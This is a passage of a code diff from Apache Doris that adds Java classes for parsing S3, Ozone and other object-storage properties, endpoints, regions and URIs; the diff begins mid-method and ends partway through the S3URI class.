      + * + * @param uri the original URI string + * @return the rewritten URI string, or the original URI if no rewrite is needed + */ + @VisibleForTesting + protected static String rewriteOssBucketIfNecessary(String uri) { + if (uri == null || uri.isEmpty()) { + return uri; + } + + URI parsed; + try { + parsed = URI.create(uri); + } catch (IllegalArgumentException e) { + // Invalid URI, do not rewrite + return uri; + } + + String scheme = parsed.getScheme(); + if ("http".equalsIgnoreCase(scheme) || "https".equalsIgnoreCase(scheme)) { + return uri; + } + + // For non-standard schemes (oss / s3), authority is more reliable than host + String authority = parsed.getAuthority(); + if (authority == null || authority.isEmpty()) { + return uri; + } + + // Handle bucket.endpoint format + int dotIndex = authority.indexOf('.'); + if (dotIndex <= 0) { + return uri; + } + + String bucket = authority.substring(0, dotIndex); + + try { + URI rewritten = new URI( + scheme, + bucket, + parsed.getPath(), + parsed.getQuery(), + parsed.getFragment() + ); + return rewritten.toString(); + } catch (URISyntaxException e) { + // Be conservative: fallback to original URI + return uri; + } + } +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/ObjectStorageProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/ObjectStorageProperties.java new file mode 100644 index 00000000000000..3844d319a9c058 --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/ObjectStorageProperties.java @@ -0,0 +1,50 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +/** + * Interface representing the properties and configurations for object storage systems. + * This interface provides methods for converting the storage properties to specific + * configurations for different protocols, such as Hadoop HDFS and AWS S3. + */ +public interface ObjectStorageProperties { + + String getEndpoint(); + + String getRegion(); + + String getAccessKey(); + + String getSecretKey(); + + void setEndpoint(String endpoint); + + void setRegion(String region); + + String getSessionToken(); + + String getMaxConnections(); + + String getRequestTimeoutS(); + + String getConnectionTimeoutS(); + + String getUsePathStyle(); + + String getForceParsingByStandardUrl(); +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/OzoneProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/OzoneProperties.java new file mode 100644 index 00000000000000..30cb9ae47bec22 --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/OzoneProperties.java @@ -0,0 +1,153 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.apache.doris.foundation.property.ConnectorProperty; + +import com.google.common.collect.ImmutableSet; +import lombok.Getter; +import lombok.Setter; +import org.apache.commons.lang3.StringUtils; + +import java.util.Map; +import java.util.Set; +import java.util.regex.Pattern; + +public class OzoneProperties extends AbstractS3CompatibleProperties { + + @Setter + @Getter + @ConnectorProperty(names = {"ozone.endpoint", "s3.endpoint"}, + required = false, + description = "The endpoint of Ozone S3 Gateway.") + protected String endpoint = ""; + + @Setter + @Getter + @ConnectorProperty(names = {"ozone.region", "s3.region"}, + required = false, + description = "The region of Ozone S3 Gateway.") + protected String region = "us-east-1"; + + @Getter + @ConnectorProperty(names = {"ozone.access_key", "s3.access_key", "s3.access-key-id"}, + required = false, + sensitive = true, + description = "The access key of Ozone S3 Gateway.") + protected String accessKey = ""; + + @Getter + @ConnectorProperty(names = {"ozone.secret_key", "s3.secret_key", "s3.secret-access-key"}, + required = false, + sensitive = true, + description = "The secret key of Ozone S3 Gateway.") + protected String secretKey = ""; + + @Getter + @ConnectorProperty(names = {"ozone.session_token", "s3.session_token", "s3.session-token"}, + required = false, + sensitive = true, + description = "The session token of Ozone S3 Gateway.") + protected String sessionToken = ""; + + @Getter + @ConnectorProperty(names = {"ozone.connection.maximum", "s3.connection.maximum"}, + required = false, + description = "Maximum number of connections.") + protected String maxConnections = "100"; + + @Getter + @ConnectorProperty(names = {"ozone.connection.request.timeout", "s3.connection.request.timeout"}, + required = false, + description = "Request timeout in seconds.") + protected String requestTimeoutS = "10000"; + + @Getter + @ConnectorProperty(names = {"ozone.connection.timeout", "s3.connection.timeout"}, + required = false, + description = "Connection timeout in seconds.") + protected String connectionTimeoutS = "10000"; + + @Setter + @Getter + @ConnectorProperty(names = {"ozone.use_path_style", "use_path_style", "s3.path-style-access"}, + required = false, + description = "Whether to use path style URL for the storage.") + protected String usePathStyle = "true"; + + @Setter + @Getter + @ConnectorProperty(names = {"ozone.force_parsing_by_standard_uri", "force_parsing_by_standard_uri"}, + required = false, + description = "Whether to use path style URL for the storage.") + protected String forceParsingByStandardUrl = "false"; + + protected OzoneProperties(Map origProps) { + super(Type.OZONE, origProps); + } + + @Override + public void initNormalizeAndCheckProps() { + hydrateFromOriginalProps(); + super.initNormalizeAndCheckProps(); + hydrateFromOriginalProps(); + } + + private void hydrateFromOriginalProps() { + endpoint = StringUtils.firstNonBlank( + endpoint, + origProps.get("ozone.endpoint"), + origProps.get("s3.endpoint")); + region = StringUtils.firstNonBlank(region, origProps.get("ozone.region"), origProps.get("s3.region")); + accessKey = StringUtils.firstNonBlank( + accessKey, + origProps.get("ozone.access_key"), + origProps.get("s3.access_key"), + origProps.get("s3.access-key-id")); + secretKey = StringUtils.firstNonBlank( + secretKey, + origProps.get("ozone.secret_key"), + origProps.get("s3.secret_key"), + origProps.get("s3.secret-access-key")); + sessionToken = StringUtils.firstNonBlank(sessionToken, origProps.get("ozone.session_token"), + origProps.get("s3.session_token"), origProps.get("s3.session-token")); + usePathStyle = StringUtils.firstNonBlank(usePathStyle, origProps.get("ozone.use_path_style"), + origProps.get("use_path_style"), origProps.get("s3.path-style-access")); + forceParsingByStandardUrl = StringUtils.firstNonBlank(forceParsingByStandardUrl, + origProps.get("ozone.force_parsing_by_standard_uri"), + origProps.get("force_parsing_by_standard_uri")); + } + + @Override + protected Set endpointPatterns() { + return ImmutableSet.of(Pattern.compile("^(?:https?://)?[a-zA-Z0-9.-]+(?::\\d+)?$")); + } + + @Override + protected void setEndpointIfPossible() { + super.setEndpointIfPossible(); + if (StringUtils.isBlank(getEndpoint())) { + throw new IllegalArgumentException("Property ozone.endpoint is required."); + } + } + + @Override + protected Set schemas() { + return ImmutableSet.of("s3", "s3a", "s3n"); + } +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/S3Properties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/S3Properties.java new file mode 100644 index 00000000000000..4449dcf5b8e4ba --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/S3Properties.java @@ -0,0 +1,358 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.apache.doris.foundation.property.ConnectorPropertiesUtils; +import org.apache.doris.foundation.property.ConnectorProperty; +import org.apache.doris.property.common.AwsCredentialsProviderMode; + +import com.google.common.collect.ImmutableSet; +import lombok.Getter; +import lombok.Setter; +import org.apache.commons.lang3.StringUtils; + +import java.util.Map; +import java.util.Objects; +import java.util.Optional; +import java.util.Set; +import java.util.regex.Pattern; +import java.util.stream.Stream; + +public class S3Properties extends AbstractS3CompatibleProperties { + + public static final String USE_PATH_STYLE = "use_path_style"; + public static final String ENDPOINT = "s3.endpoint"; + public static final String REGION = "s3.region"; + public static final String ROLE_ARN = "s3.role_arn"; + public static final String EXTERNAL_ID = "s3.external_id"; + public static final String CREDENTIALS_PROVIDER_TYPE = "s3.credentials_provider_type"; + + private static final String[] ENDPOINT_NAMES_FOR_GUESSING = { + "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT", "aws.endpoint", "glue.endpoint", + "aws.glue.endpoint" + }; + + private static final String[] REGION_NAMES_FOR_GUESSING = { + "s3.region", "glue.region", "aws.glue.region", "iceberg.rest.signing-region", + "rest.signing-region", "client.region" + }; + + @Setter + @Getter + @ConnectorProperty(names = {ENDPOINT, "AWS_ENDPOINT", "endpoint", "ENDPOINT", "aws.endpoint", "glue.endpoint", + "aws.glue.endpoint"}, + required = false, + description = "The endpoint of S3.") + protected String endpoint = ""; + + @Setter + @Getter + @ConnectorProperty(names = {REGION, "AWS_REGION", "region", "REGION", "aws.region", "glue.region", + "aws.glue.region", "iceberg.rest.signing-region", "rest.signing-region", "client.region"}, + required = false, + isRegionField = true, + description = "The region of S3.") + protected String region = ""; + + @Getter + @ConnectorProperty(names = {"s3.access_key", "AWS_ACCESS_KEY", "access_key", "ACCESS_KEY", "glue.access_key", + "aws.glue.access-key", "client.credentials-provider.glue.access_key", "iceberg.rest.access-key-id", + "s3.access-key-id"}, + required = false, + sensitive = true, + description = "The access key of S3. Optional for anonymous access to public datasets.") + protected String accessKey = ""; + + @Getter + @ConnectorProperty(names = {"s3.secret_key", "AWS_SECRET_KEY", "secret_key", "SECRET_KEY", "glue.secret_key", + "aws.glue.secret-key", "client.credentials-provider.glue.secret_key", "iceberg.rest.secret-access-key", + "s3.secret-access-key"}, + required = false, + sensitive = true, + description = "The secret key of S3. Optional for anonymous access to public datasets.") + protected String secretKey = ""; + + @Getter + @ConnectorProperty(names = {"s3.session_token", "session_token", "s3.session-token", "AWS_TOKEN", + "iceberg.rest.session-token"}, + required = false, + description = "The session token of S3.") + protected String sessionToken = ""; + + @Getter + @ConnectorProperty(names = {"s3.session-token-token-expires-at-ms"}, + required = false, + description = "The session token expiration time in milliseconds since epoch.") + protected String sessionTokenExpiresAtMs = ""; + + @Getter + @ConnectorProperty(names = {"s3.connection.maximum", + "AWS_MAX_CONNECTIONS"}, + required = false, + description = "The maximum number of connections to S3.") + protected String maxConnections = "50"; + + @Getter + @ConnectorProperty(names = {"s3.connection.request.timeout", + "AWS_REQUEST_TIMEOUT_MS"}, + required = false, + description = "The request timeout of S3 in milliseconds,") + protected String requestTimeoutS = "3000"; + + @Getter + @ConnectorProperty(names = {"s3.connection.timeout", + "AWS_CONNECTION_TIMEOUT_MS"}, + required = false, + description = "The connection timeout of S3 in milliseconds,") + protected String connectionTimeoutS = "1000"; + + @Setter + @Getter + @ConnectorProperty(names = {USE_PATH_STYLE, "s3.path-style-access"}, required = false, + description = "Whether to use path style URL for the storage.") + protected String usePathStyle = "false"; + + @ConnectorProperty(names = {"force_parsing_by_standard_uri"}, required = false, + description = "Whether to use path style URL for the storage.") + @Setter + @Getter + protected String forceParsingByStandardUrl = "false"; + + @ConnectorProperty(names = {"s3.sts_endpoint"}, + supported = false, + required = false, + description = "The sts endpoint of S3.") + protected String s3StsEndpoint = ""; + + @ConnectorProperty(names = {"s3.sts_region"}, + supported = false, + required = false, + description = "The sts region of S3.") + protected String s3StsRegion = ""; + + @Getter + @ConnectorProperty(names = {ROLE_ARN, "AWS_ROLE_ARN", "glue.role_arn"}, + required = false, + description = "The iam role of S3.") + protected String s3IAMRole = ""; + + @Getter + @ConnectorProperty(names = {EXTERNAL_ID, "AWS_EXTERNAL_ID", "glue.external_id"}, + required = false, + description = "The external id of S3.") + protected String s3ExternalId = ""; + + @ConnectorProperty(names = {CREDENTIALS_PROVIDER_TYPE, "glue.credentials_provider_type", + "iceberg.rest.credentials_provider_type"}, + required = false, + description = "The credentials provider type of S3. " + + "Options are: DEFAULT, ASSUME_ROLE, ENVIRONMENT, SYSTEM_PROPERTIES, " + + "WEB_IDENTITY_TOKEN_FILE, INSTANCE_PROFILE. " + + "If not set, it will use the default provider chain of AWS SDK.") + protected String awsCredentialsProviderType = AwsCredentialsProviderMode.DEFAULT.name(); + + @Getter + private AwsCredentialsProviderMode awsCredentialsProviderMode; + + public static S3Properties of(Map properties) { + S3Properties propertiesObj = new S3Properties(properties); + ConnectorPropertiesUtils.bindConnectorProperties(propertiesObj, properties); + propertiesObj.initNormalizeAndCheckProps(); + return propertiesObj; + } + + /** + * Pattern to match various AWS S3 endpoint formats and extract the region part. + *

      + * Supported formats: + * - s3.us-west-2.amazonaws.com => region = us-west-2 + * - s3.dualstack.us-east-1.amazonaws.com => region = us-east-1 + * - s3-fips.us-east-2.amazonaws.com => region = us-east-2 + * - s3-fips.dualstack.us-east-2.amazonaws.com => region = us-east-2 + * - s3express-control.us-west-2.amazonaws.com => region = us-west-2 (S3 Directory Bucket Regional) + * - s3express-usw2-az1.us-west-2.amazonaws.com => region = us-west-2 (S3 Directory Bucket Zonal) + *

      + * Group(1), Group(2), or Group(3) in the pattern captures the region part if available. + *

      + * For Glue https://docs.aws.amazon.com/general/latest/gr/glue.html + */ + private static final Set ENDPOINT_PATTERN = ImmutableSet.of( + Pattern.compile( + "^(?:https?://)?(?:" + + "s3(?:[-.]fips)?(?:[-.]dualstack)?[-.]([a-z0-9-]+)|" // Standard S3 endpoints + + "s3express-control\\.([a-z0-9-]+)|" // Directory bucket regional + + "s3express-[a-z0-9-]+\\.([a-z0-9-]+)" // Directory bucket zonal + + ")\\.amazonaws\\.com(?:/.*)?$", + Pattern.CASE_INSENSITIVE), + Pattern.compile( + "^(?:https?://)?glue(?:-fips)?\\.([a-z0-9-]+)\\.(amazonaws\\.com(?:\\.cn)?|api\\.aws)$", + Pattern.CASE_INSENSITIVE)); + + public S3Properties(Map origProps) { + super(Type.S3, origProps); + } + + @Override + public void initNormalizeAndCheckProps() { + super.initNormalizeAndCheckProps(); + if (StringUtils.isNotBlank(s3ExternalId) && StringUtils.isBlank(s3IAMRole)) { + throw new IllegalArgumentException("s3.external_id must be used with s3.role_arn"); + } + convertGlueToS3EndpointIfNeeded(); + awsCredentialsProviderMode = AwsCredentialsProviderMode.fromString(awsCredentialsProviderType); + } + + /** + * Guess if the storage properties is for this storage type. + * Subclass should override this method to provide the correct implementation. + * + * @return + */ + protected static boolean guessIsMe(Map origProps) { + String endpoint = Stream.of(ENDPOINT_NAMES_FOR_GUESSING) + .map(origProps::get) + .filter(Objects::nonNull) + .findFirst() + .orElse(null); + /** + * Check if the endpoint contains "amazonaws.com" to determine if it's an S3-compatible storage. + * Note: This check should not be overly strict, as a malformed or misconfigured endpoint may + * cause the type detection to fail, leading to missed recognition of valid S3 properties. + * A more robust approach would allow further validation downstream rather than failing early here. + */ + if (StringUtils.isNotBlank(endpoint)) { + return endpoint.contains("amazonaws.com"); + } + + // guess from URI + Optional uriValue = origProps.entrySet().stream() + .filter(e -> e.getKey().equalsIgnoreCase("uri")) + .map(Map.Entry::getValue) + .findFirst(); + if (uriValue.isPresent()) { + return uriValue.get().contains("amazonaws.com"); + } + + // guess from region + String region = Stream.of(REGION_NAMES_FOR_GUESSING) + .map(origProps::get) + .filter(Objects::nonNull) + .findFirst() + .orElse(null); + if (StringUtils.isNotBlank(region)) { + return true; + } + return false; + } + + @Override + protected Set endpointPatterns() { + return ENDPOINT_PATTERN; + } + + @Override + protected Set schemas() { + return ImmutableSet.of("s3", "s3a", "s3n"); + } + + @Override + public Map getBackendConfigProperties() { + Map backendProperties = generateBackendS3Configuration(); + + if (StringUtils.isNotBlank(s3IAMRole)) { + backendProperties.put("AWS_ROLE_ARN", s3IAMRole); + } + if (StringUtils.isNotBlank(s3ExternalId)) { + backendProperties.put("AWS_EXTERNAL_ID", s3ExternalId); + } + return backendProperties; + } + + @Override + protected String getAwsCredentialsProviderTypeForBackend() { + return awsCredentialsProviderMode == null ? null : awsCredentialsProviderMode.getMode(); + } + + private void convertGlueToS3EndpointIfNeeded() { + if (this.endpoint.contains("glue")) { + this.endpoint = "https://s3." + this.region + ".amazonaws.com"; + } + } + + /** + * Builds the {@code fs.s3a.*} Hadoop config keys for assumed-role (IAM role) access when no static access key is + * configured. + * + *

      NOTE (fe-property simplification): the legacy fe-core class branched on the FE-global + * {@code Config.aws_credentials_provider_version} ("v1"/"v2") and consulted {@code AwsCredentialsProviderFactory}. + * fe-property is a connector-facing parsing module with no fe-core {@code Config} and no AWS SDK dependency, so it + * emits the default (v1) assumed-role provider wiring only, referencing provider classes by their fully-qualified + * name string. Consumers needing the v2 wiring set the credential-provider keys themselves. + */ + @Override + public void initializeHadoopStorageConfig() { + super.initializeHadoopStorageConfig(); + if (StringUtils.isNotBlank(accessKey)) { + return; + } + // Set assumed_roles + // @See https://hadoop.apache.org/docs/r3.4.1/hadoop-aws/tools/hadoop-aws/assumed_roles.html + if (StringUtils.isNotBlank(s3IAMRole)) { + // @See org.apache.hadoop.fs.s3a.auth.AssumedRoleCredentialProvider + hadoopConfigMap.put("fs.s3a.assumed.role.arn", s3IAMRole); + hadoopConfigMap.put("fs.s3a.aws.credentials.provider", + "org.apache.hadoop.fs.s3a.auth.AssumedRoleCredentialProvider"); + hadoopConfigMap.put("fs.s3a.assumed.role.credentials.provider", + "software.amazon.awssdk.auth.credentials.InstanceProfileCredentialsProvider"); + if (StringUtils.isNotBlank(s3ExternalId)) { + hadoopConfigMap.put("fs.s3a.assumed.role.external.id", s3ExternalId); + } + } + } + + @Override + protected String getEndpointFromRegion() { + if (!StringUtils.isBlank(endpoint)) { + return endpoint; + } + if (StringUtils.isBlank(region)) { + return ""; + } + return "https://s3." + region + ".amazonaws.com"; + } + + private static final Pattern IPV4_PORT_PATTERN = Pattern.compile("((?:\\d{1,3}\\.){3}\\d{1,3}:\\d{1,5})"); + + public static String getRegionOfEndpoint(String endpoint) { + if (IPV4_PORT_PATTERN.matcher(endpoint).find()) { + // if endpoint contains '192.168.0.1:8999', return null region + return null; + } + String[] endpointSplit = endpoint.replace("http://", "") + .replace("https://", "") + .split("\\."); + if (endpointSplit.length < 2) { + return null; + } + if (endpointSplit[0].contains("oss-")) { + // compatible with the endpoint: oss-cn-bejing.aliyuncs.com + return endpointSplit[0]; + } + return endpointSplit[1]; + } +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/S3PropertyUtils.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/S3PropertyUtils.java new file mode 100644 index 00000000000000..cb2a8c46395d8d --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/S3PropertyUtils.java @@ -0,0 +1,228 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.apache.doris.foundation.property.StoragePropertiesException; + +import org.apache.commons.lang3.StringUtils; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.net.URI; +import java.net.URISyntaxException; +import java.util.Map; +import java.util.Optional; + +public class S3PropertyUtils { + private static final Logger LOG = LogManager.getLogger(S3PropertyUtils.class); + + private static final String SCHEME_DELIM = "://"; + private static final String S3_SCHEME_PREFIX = "s3://"; + + // S3-compatible schemes that can be converted to s3:// with simple string replacement + // Format: scheme://bucket/key -> s3://bucket/key + private static final String[] SIMPLE_S3_COMPATIBLE_SCHEMES = { + "s3a", "s3n", "oss", "cos", "cosn", "obs", "bos", "gs" + }; + + /** + * Constructs the S3 endpoint from a given URI in the props map. + * + * @param props the map containing the S3 URI, keyed by URI_KEY + * @param stringUsePathStyle whether to use path-style access ("true"/"false") + * @param stringForceParsingByStandardUri whether to force parsing using the standard URI format ("true"/"false") + * @return the extracted S3 endpoint or null if URI is invalid or parsing fails + *

      + * Example: + * Input URI: "https://s3.us-west-1.amazonaws.com/my-bucket/my-key" + * Output: "s3.us-west-1.amazonaws.com" + */ + public static String constructEndpointFromUrl(Map props, + String stringUsePathStyle, + String stringForceParsingByStandardUri) { + Optional uriOptional = props.entrySet().stream() + .filter(e -> e.getKey().equalsIgnoreCase(StorageProperties.URI_KEY)) + .map(Map.Entry::getValue) + .findFirst(); + + if (!uriOptional.isPresent()) { + return null; + } + String uri = uriOptional.get(); + if (StringUtils.isBlank(uri)) { + return null; + } + boolean usePathStyle = Boolean.parseBoolean(stringUsePathStyle); + boolean forceParsingByStandardUri = Boolean.parseBoolean(stringForceParsingByStandardUri); + S3URI s3uri; + try { + s3uri = S3URI.create(uri, usePathStyle, forceParsingByStandardUri); + } catch (StoragePropertiesException e) { + throw new IllegalArgumentException("Invalid S3 URI: " + uri + ",usePathStyle: " + usePathStyle + + " forceParsingByStandardUri: " + forceParsingByStandardUri, e); + } + return s3uri.getEndpoint().orElse(null); + } + + /** + * Extracts the S3 region from a URI in the given props map. + * + * @param props the map containing the S3 URI, keyed by URI_KEY + * @param stringUsePathStyle whether to use path-style access ("true"/"false") + * @param stringForceParsingByStandardUri whether to force parsing using the standard URI format ("true"/"false") + * @return the extracted S3 region or null if URI is invalid or parsing fails + *

      + * Example: + * Input URI: "https://s3.us-west-1.amazonaws.com/my-bucket/my-key" + * Output: "us-west-1" + */ + public static String constructRegionFromUrl(Map props, + String stringUsePathStyle, + String stringForceParsingByStandardUri) { + Optional uriOptional = props.entrySet().stream() + .filter(e -> e.getKey().equalsIgnoreCase(StorageProperties.URI_KEY)) + .map(Map.Entry::getValue) + .findFirst(); + + if (!uriOptional.isPresent()) { + return null; + } + String uri = uriOptional.get(); + if (StringUtils.isBlank(uri)) { + return null; + } + boolean usePathStyle = Boolean.parseBoolean(stringUsePathStyle); + boolean forceParsingByStandardUri = Boolean.parseBoolean(stringForceParsingByStandardUri); + S3URI s3uri = null; + try { + s3uri = S3URI.create(uri, usePathStyle, forceParsingByStandardUri); + } catch (StoragePropertiesException e) { + throw new IllegalArgumentException("Invalid S3 URI: " + uri + ",usePathStyle: " + usePathStyle + + " forceParsingByStandardUri: " + forceParsingByStandardUri, e); + } + return s3uri.getRegion().orElse(null); + } + + /** + * Validates and normalizes the given path into a standard S3 URI. + * If the input already starts with a known S3-compatible scheme (s3://, s3a://, oss://, etc.), + * it is returned as-is to avoid expensive regex parsing. + * Otherwise, it is parsed and converted into an S3-compatible URI format. + * + * @param path the raw S3-style path or full URI + * @param stringUsePathStyle whether to use path-style access ("true"/"false") + * @param stringForceParsingByStandardUri whether to force parsing using the standard URI format ("true"/"false") + * @return normalized S3 URI string like "s3://bucket/key" + * @throws StoragePropertiesException if the input path is blank or invalid + *

      + * Example: + * Input: "https://s3.us-west-1.amazonaws.com/my-bucket/my-key" + * Output: "s3://my-bucket/my-key" + */ + public static String validateAndNormalizeUri(String path, + String stringUsePathStyle, + String stringForceParsingByStandardUri) + throws StoragePropertiesException { + if (StringUtils.isBlank(path)) { + throw new StoragePropertiesException("path is null"); + } + + // Fast path 1: s3:// paths are already in the normalized format expected by BE + if (path.startsWith(S3_SCHEME_PREFIX)) { + return path; + } + + // Fast path 2: simple S3-compatible schemes (oss://, cos://, s3a://, etc.) + // can be converted with simple string replacement: scheme://bucket/key -> s3://bucket/key + String normalized = trySimpleSchemeConversion(path); + if (normalized != null) { + return normalized; + } + + // Full parsing path: for HTTP URLs and other complex formats + boolean usePathStyle = Boolean.parseBoolean(stringUsePathStyle); + boolean forceParsingByStandardUri = Boolean.parseBoolean(stringForceParsingByStandardUri); + S3URI s3uri = S3URI.create(path, usePathStyle, forceParsingByStandardUri); + return "s3" + S3URI.SCHEME_DELIM + s3uri.getBucket() + S3URI.PATH_DELIM + s3uri.getKey(); + } + + /** + * Try to convert simple S3-compatible scheme URIs to s3:// format using string replacement. + * This avoids expensive regex parsing for common cases like oss://bucket/key, s3a://bucket/key, etc. + * + * @param path the input path + * @return converted s3:// path if successful, null if the path doesn't match simple pattern + */ + private static String trySimpleSchemeConversion(String path) { + int delimIndex = path.indexOf(SCHEME_DELIM); + if (delimIndex <= 0) { + return null; + } + + String scheme = path.substring(0, delimIndex).toLowerCase(); + for (String compatibleScheme : SIMPLE_S3_COMPATIBLE_SCHEMES) { + if (compatibleScheme.equals(scheme)) { + String rest = path.substring(delimIndex + SCHEME_DELIM.length()); + if (rest.isEmpty() || rest.startsWith(S3URI.PATH_DELIM) || rest.contains(SCHEME_DELIM)) { + return null; + } + // Simple conversion: replace scheme with "s3" + // e.g., "oss://bucket/key" -> "s3://bucket/key" + return S3_SCHEME_PREFIX + rest; + } + } + return null; + } + + /** + * Extracts and returns the raw URI string from the given props map. + * + * @param props the map expected to contain a 'uri' entry + * @return the URI string from props + * @throws StoragePropertiesException if the map is empty or does not contain 'uri' + *

      + * Example: + * Input: {"uri": "s3://my-bucket/my-key"} + * Output: "s3://my-bucket/my-key" + */ + public static String validateAndGetUri(Map props) { + if (props.isEmpty()) { + throw new StoragePropertiesException("props is empty"); + } + Optional uriOptional = props.entrySet().stream() + .filter(e -> e.getKey().equalsIgnoreCase(StorageProperties.URI_KEY)) + .map(Map.Entry::getValue) + .findFirst(); + + if (!uriOptional.isPresent()) { + throw new StoragePropertiesException("props must contain uri"); + } + return uriOptional.get(); + } + + public static String convertPathToS3(String path) { + try { + URI orig = new URI(path); + URI s3url = new URI("s3", orig.getRawAuthority(), + orig.getRawPath(), orig.getRawQuery(), orig.getRawFragment()); + return s3url.toString(); + } catch (URISyntaxException e) { + return path; + } + } +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/S3URI.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/S3URI.java new file mode 100644 index 00000000000000..68cffaed374f98 --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/S3URI.java @@ -0,0 +1,404 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.apache.doris.foundation.property.StoragePropertiesException; + +import com.google.common.base.Strings; +import com.google.common.collect.ImmutableSet; +import org.apache.commons.lang3.StringUtils; + +import java.net.URI; +import java.net.URISyntaxException; +import java.util.ArrayList; +import java.util.List; +import java.util.Map; +import java.util.Optional; +import java.util.Set; +import java.util.regex.Matcher; +import java.util.regex.Pattern; +import java.util.stream.Collectors; + +/** + * This class represents a fully qualified location in S3 for input/output + * operations expressed as as URI. + *

      + * For AWS S3, uri common styles should be: + * 1. AWS Client Style(Hadoop S3 Style): s3://my-bucket/path/to/file?versionId=abc123&partNumber=77&partNumber=88 + * or + * 2. Virtual Host Style: https://my-bucket.s3.us-west-1.amazonaws.com/resources/doc.txt?versionId=abc123&partNumber=77&partNumber=88 + * or + * 3. Path Style: https://s3.us-west-1.amazonaws.com/my-bucket/resources/doc.txt?versionId=abc123&partNumber=77&partNumber=88 + * + * Regarding the above-mentioned common styles, we can use isPathStyle to control whether to use path style + * or virtual host style. + * "Virtual host style" is the currently mainstream and recommended approach to use, so the default value of + * isPathStyle is false. + * + * Other Styles: + * 1. Virtual Host AWS Client (Hadoop S3) Mixed Style: + * s3://my-bucket.s3.us-west-1.amazonaws.com/resources/doc.txt?versionId=abc123&partNumber=77&partNumber=88 + * or + * 2. Path AWS Client (Hadoop S3) Mixed Style: + * s3://s3.us-west-1.amazonaws.com/my-bucket/resources/doc.txt?versionId=abc123&partNumber=77&partNumber=88 + * + * For these two styles, we can use isPathStyle and forceParsingByStandardUri + * to control whether to use. + * Virtual Host AWS Client (Hadoop S3) Mixed Style: isPathStyle = false && forceParsingByStandardUri = true + * Path AWS Client (Hadoop S3) Mixed Style: isPathStyle = true && forceParsingByStandardUri = true + * + */ + +public class S3URI { + + private static final Pattern URI_PATTERN = + Pattern.compile("^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\\?([^#]*))?(#(.*))?"); + public static final String SCHEME_DELIM = "://"; + public static final String PATH_DELIM = "/"; + private static final Set VALID_SCHEMES = ImmutableSet.of("http", "https", "s3", "s3a", "s3n", + "bos", "oss", "cos", "cosn", "obs", "gs", "azure"); + + private static final Set OS_SCHEMES = ImmutableSet.of("s3", "s3a", "s3n", + "bos", "oss", "cos", "cosn", "gs", "obs", "azure"); + + /** Suffix of S3Express storage bucket names. */ + private static final String S3_DIRECTORY_BUCKET_SUFFIX = "--x-s3"; + + private URI uri; + + private String bucket; + private String key; + + private String endpoint; + + private String region; + + private boolean isStandardURL; + 